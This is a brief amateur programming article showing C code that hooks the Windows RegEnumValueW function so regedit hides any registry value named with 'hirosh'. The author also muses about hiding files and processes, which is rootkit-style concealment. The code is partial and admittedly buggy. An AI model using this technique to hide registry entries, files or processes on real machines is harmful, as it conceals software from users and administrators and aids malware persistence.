Introduction
This Article Explains how to hide a registry string from regedit by hooking
the RegEnumValueW
API, In this article there is a Function that hooks APIs
called
HookAPICalls
. I am not the author of that function - I got it from some
website whose name I forget.
Thanks to the author of that function. The function that replaces the
RegEnumValueW
is given below
.
LONG MyRegEnumValue(HKEY hKey,
DWORD dwIndex,
LPWSTR lpValueName,
LPDWORD lpcValueName,
LPDWORD lpReserved,
LPDWORD lpType,
LPBYTE lpData,
LPDWORD lpcbData)
{
LONG ret;
RegEnumValueWtype oldfn=(RegEnumValueWtype)RegDLL_Hooks.Functions [0].OrigFn;
char ss[10];
ret=oldfn(hKey,dwIndex,lpValueName,lpcValueName,lpReserved,lpType,lpData,lpcbData);
WideCharToMultiByte(CP_ACP, 0,lpValueName,
-1,
ss,
10,
NULL, NULL);
if (strstr(ss,"hirosh")!=NULL)
return 1;
else
return ret;
}
This function simply checks the string "hirosh" from the lpValueName and if found
it will return a 1. That means the the function has not completed successfully,
so regedit will not display any string that contains the word "hirosh".
API hooking is a powerful tool. To use this we can also hide files, processed from
OS. However, I don't know which APIs must be hooked to achieve this. If anybody knows this
please help me.
I check this program on Windows XP. regedit is OK but when I take
msconfig it displays an error. I don't know what is the problem so if anybody knows this
please help me. I am not experienced in API hooking so I am just experiment with this.
This member has not yet provided a Biography. Assume it's interesting and varied, and probably something to do with programming.